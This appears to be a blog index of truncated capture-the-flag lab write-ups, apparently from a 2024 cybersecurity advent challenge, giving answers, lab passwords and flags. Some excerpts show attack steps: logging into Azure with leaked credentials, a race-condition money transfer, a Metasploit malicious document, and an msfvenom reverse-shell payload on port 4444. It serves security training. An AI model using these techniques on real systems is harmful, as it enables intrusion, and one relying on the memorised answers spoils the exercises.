Aleyna
Lab link. Questions 1. Extract all the events from the cctv_feed logs. How many logs were captured associated with the successful login? 642 2. What is the Session_id associated with the attacker who deleted the recording? rij5uu4gt204q0d3eb7jj86okt 3. What is the name of the attacker found in the logs, who deleted the CCTV footage?
Lab link. Questions 1. What is the password for backupware that was leaked? az ad user list –filter “startsWith(‘wvusr-‘, displayName)” R3c0v3r_s3cr3ts! 2. What is the group ID of the Secret Recovery Group? 7d96660a-02e1-4112-9515-1762d0cb66b7 3. What is the name of the vault secret? az account clearaz login -u wvusr-backupware@aoc2024.onmicrosoft.com -p R3c0v3r_s3cr3ts! az keyvault list az keyvault …
Lab link. Questions 1. On what day was Glitch_Malware last logged in? Answer format: DD/MM/YYYY 07/11/2024 2. What event ID shows the login of the Glitch_Malware user? 4624 3. Read the PowerShell history of the Administrator account. What was the command that was used to enumerate Active Directory users? notepad “$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt” Get-ADUser -Filter * -Properties …
Lab link. Questions 1. What is the name of the CA that has signed the Gift Scheduler certificate? THM 2. Look inside the POST requests in the HTTP history. What is the password for the snowballelf account? c4rrotn0s3 3. Use the credentials for any of the elves to authenticate to the Gift Scheduler website. What is the …
Lab link. Questions 1. What is the value of Flag1? 2. What is the value of Flag2?
Lab link. 1. What is the flag value after transferring over $2000 from Glitch’s account? We send the POST /transfer request to the repeater. I wanted to send 500 dollars, so I multiplied the request so much that it exceeded 2000 dollars. Then, I made a requests group and sent it as a parallel. Then …
Lab link. Lab Summary Wi-Fi is the technology that connects our devices to the internet wirelessly. A router connects our devices to the internet via Wi-Fi. To connect to the router, our devices create an SSID (Wi-Fi network name) list and join the network by entering a password (PSK – Pre-Shared Key). WPA/WPA2 uses a …
Lab link. Questions 1. What is the flag value inside the flag.txt file that’s located on the Administrator’s desktop? 1. Creating the Malicious Document Metasploit Framework is started with the msfconsole command. It is a tool used to initiate an attack. msfconsole Payload is the code that will be executed on the target system after a successful …
Lab link. Questions 1. What does GRC stand for? 2. What is the flag you receive after performing the risk assessment? Vendor 1Azure Falcon Vendor 2Indigo Dragon Vendor 3Sapphire Wyrm
Lab link. Questions 1. What is the flag value once Glitch gets reverse shell on the digital vault using port 4444? Note: The flag may take around a minute to appear in the C:\Users\glitch\Desktop directory. You can view the content of the flag by using the command type C:\Users\glitch\Desktop\flag.txt. msfvenom -p windows/x64/shell_reverse_tcp LHOST=Your_IP LPORT=4444 -f powershell Let’s copy …